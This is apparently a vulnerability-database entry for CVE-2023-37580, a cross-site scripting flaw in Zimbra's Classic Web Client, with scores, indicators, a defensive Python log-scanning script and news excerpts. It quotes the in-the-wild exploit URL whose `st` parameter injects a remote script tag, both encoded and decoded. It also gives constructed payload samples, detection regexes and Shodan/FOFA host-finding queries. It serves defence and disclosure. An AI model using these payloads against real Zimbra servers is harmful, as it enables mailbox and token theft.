CVE-2023-37580
Published: 2023-07-31
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
Priority: P1 · 81 · Medium 6.1 (CVSS 3.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Tags: KEV · ITW · Exploit
CISA Known Exploited Vulnerability, remediation due 2023-08-17
Exploited in the wild
EPSS: 59.04% (99.0th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synacor | zimbra_collaboration_suite | — | — |
| synacor | zimbra_collaboration_suite | >= 8.8.0 < 8.8.15 | 8.8.15 |
Detection & IOCs (extracted from sources)
- URL (exploit request observed in the wild; target host redacted at source): https://mail.REDACTED[.]com/m/momoveto?st=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyMSCXWyBWJpIos%2Ejs%22%3E%3C%2Fscript%3E%2F%2F
  URL-decoded, the `st` value is (attacker domain defanged): acg"/><script src="https://obsorth[.]opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js"></script>//
- Path: /m/momoveto?st=
- Favicon hash (Shodan query syntax): http.favicon.hash:475145467
- Favicon hash (FOFA query syntax): icon_hash="475145467"
- The XSS is triggered via the `st` parameter of the `/m/momoveto` endpoint in the Zimbra Classic Web Client; monitor HTTP requests to this path whose `st` parameter carries script-injection patterns. URL-decode the value before matching: the in-the-wild request above is fully percent-encoded, so a raw search for `<script` will miss it.
- Campaign 4 (Pakistan) exfiltrated Zimbra authentication tokens to ntcpk[.]org; treat outbound connections from Zimbra servers to this domain as an indicator of token theft.
- Most exploitation occurred after the hotfix was pushed to GitHub but before the official patch; monitor for exploitation attempts even on partially patched or recently patched instances.
- The fix for CVE-2023-37580 escapes the contents of the `st` parameter before it is set as the value in an HTML object; verify this escaping is present in the deployed version.
- The vulnerability affects Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41; the official patch was released July 25, 2023.
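As an added example (this is not Zimbra's code and is not taken from any of the sources cited on this page), the Python script below applies the first and fourth notes above: it parses access-log lines, URL-decodes the `st` parameter of `/m/momoveto` requests (peeling double encoding), flags values that contain markup, and shows what HTML-attribute escaping does to such a value. It assumes Combined Log Format lines (adjust `LOG_RE` for your reverse proxy's format); the sample log lines are constructed, with `example.invalid` standing in for the attacker's script host.

```python
"""
Access-log triage for CVE-2023-37580 probes against /m/momoveto.

Added example: not Zimbra's code and not from any cited source. Assumes
Combined Log Format lines (Apache/nginx default); SAMPLE_LOG is constructed,
with a placeholder script host.
"""
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined Log Format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Fragments that have no business in a mailbox-move state parameter:
# a script tag, any other tag, a javascript: URL, an event-handler attribute,
# or a quote followed by a self-closing ("/>) attribute breakout.
SUSPICIOUS = re.compile(
    r'(<\s*/?\s*script|</?\s*[a-z][^>]*>|javascript:|\bon[a-z]+\s*=|["\'][^"\']*/>)',
    re.IGNORECASE,
)

VULN_PATH = "/m/momoveto"


def decode_st(target):
    """Return the fully decoded `st` value for a /m/momoveto request, else None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("st")
    if not values:
        return None
    value = values[0]          # parse_qs already removed one layer of %-encoding
    for _ in range(3):         # peel double/triple encoding used to dodge naive filters
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(lines):
    """Return (client, decoded_st) for each request whose st value looks like markup."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        st = decode_st(m.group("target"))
        if st is not None and SUSPICIOUS.search(st):
            hits.append((m.group("client"), st))
    return hits


def escape_st(value):
    """What the vendor fix amounts to: render st inert inside an HTML attribute."""
    return html.escape(value, quote=True)


# Constructed sample lines: a benign request, the in-the-wild payload shape with a
# placeholder host, a double-encoded variant, and a script string on an unrelated path.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Jun/2023:10:01:12 +0000] "GET /m/momoveto?st=message&id=1234 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Jun/2023:10:02:45 +0000] "GET /m/momoveto?st=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fexample.invalid%2Fx.js%22%3E%3C%2Fscript%3E%2F%2F HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [29/Jun/2023:10:03:01 +0000] "GET /m/momoveto?st=%2522%252F%253E%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 0 "-" "curl/8.0"',
    '203.0.113.9 - - [29/Jun/2023:10:04:20 +0000] "GET /h/search?query=%3Cscript%3E HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, st in scan_log(SAMPLE_LOG):
        print(f"{client}: st={st!r}")
        print(f"  escaped (post-fix rendering): {escape_st(st)}")
```

Only the two `/m/momoveto` requests are reported; the `/h/search` line is ignored because the path filter runs before the content check, and the benign `st=message` request produces no match. The part to adapt in practice is `LOG_RE`: Zimbra deployments log through their own proxy and mailboxd layers, whose formats differ.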
CVSS provenance
| Source | Score | Severity | Vector |
|---|---|---|---|
| NVD (v3.1) | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| VulnCheck | 6.1 | MEDIUM | — |
| CISA | 6.1 | MEDIUM | — |
CISA
Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
Source: cisa · 2023-07-27 · CVSS 6.1 (MEDIUM) · CWE-79
Vulnerability: Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Synacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability impacting the confidentiality and integrity of data.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://wiki.zimbra.com/wiki/Security_Center ; https://nvd.nist.gov/vuln/detail/CVE-2023-37580
Remediation Due Date: 2023-08-17
GHSA
GHSA-vw6f-667c-3jv3: Zimbra Collaboration (ZCS) 8 before 8
Source: ghsa_unreviewed · 2023-07-31 · MEDIUM · CWE-79
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
VulnCheck
Synacor Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
Source: vulncheck · 2023 · CVSS 6.1 (MEDIUM) · CWE-79
Synacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting vulnerability impacting the confidentiality and integrity of data.
Affected: Synacor Zimbra Collaboration Suite (ZCS)
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References:
- https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit
- https://twitter.com/maddiestone/status/1679542322772721664
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://blog.google/threat-analysis-group/zimbra-0-day-used-to-target-international-government-organizations/
- https://ti.qianxin.com/uplo
No detection rules found.
Nuclei
Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
Source: nuclei · CVSS 6.1 (MEDIUM)
Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
Template:
id: CVE-2023-37580
info:
  name: Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS).
  reference:
Checkpoint
20th November – Threat Intelligence Report
Source: blogs_checkpoint · 2023-11-20 · CVSS 7.8 · CVE-2023-38831 [HIGH]
## 20th November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 20th November, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Russia-affiliated military intelligence group SandWorm is reportedly responsible for an attack against 22 critical infrastructure companies in Denmark. The attacks, most severe in Danish history, have compromised industrial control systems and forced companies from the energy sector to work offline.
Medusa ransomware g
Bleepingcomputer
Google: Hackers exploited Zimbra zero-day in attacks on govt orgs
Source: blogs_bleepingcomputer · 2023-11-17 · CVSS 6.1 (MEDIUM)
## Google: Hackers exploited Zimbra zero-day in attacks on govt orgs
By Bill Toulas
Google's Threat Analysis Group (TAG) has discovered that threat actors exploited a zero-day vulnerability in Zimbra Collaboration email server to steal sensitive data from government systems in multiple countries.
Hackers leveraged a medium-severity security issue now identified as CVE-2023-37580 since June 29, nearly a month before the vendor addressed it in version 8.8.15 Patch 41 of the software on July 25.
The flaw is an XSS (cross-site scripting) issue present in the Zimbra Classic Web Client.
## Attack and response timeline
According to Google's threat analysts, the threat actors exploited the vulnerability on government systems in Greece, Moldova, Tunisia, Vietnam, and Pakistan to steal email da
Google Tag
Zimbra 0-day used to target international government organizations
Source: blogs_google_tag · 2023-11-16 · CVSS 6.1 (MEDIUM)
Threat Analysis Group
## Zimbra 0-day used to target international government organizations
Nov 16, 2023
In June 2023, Google’s Threat Analysis Group (TAG) discovered an in-the-wild 0-day exploit targeting Zimbra Collaboration, an email server many organizations use to host their email. Since discovering the 0-day, now patched as CVE-2023-37580 , TAG has observed four different groups exploiting the same bug to steal email data, user credentials, and authentication tokens. Most of this activity occurred after the initial fix became public on Github. To ensure protection against these types of exploits, TAG urges users and organizations to keep software fully up-to-date and apply security updates as soon as they become available.
## 0-day discovery, hotfix and patch
TAG first discovere
References:
- http://www.openwall.com/lists/oss-security/2023/11/17/2
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-37580
Timeline:
- 2023-07-27: Added to CISA KEV
- 2023-07-31: Published
- Exploited in the wild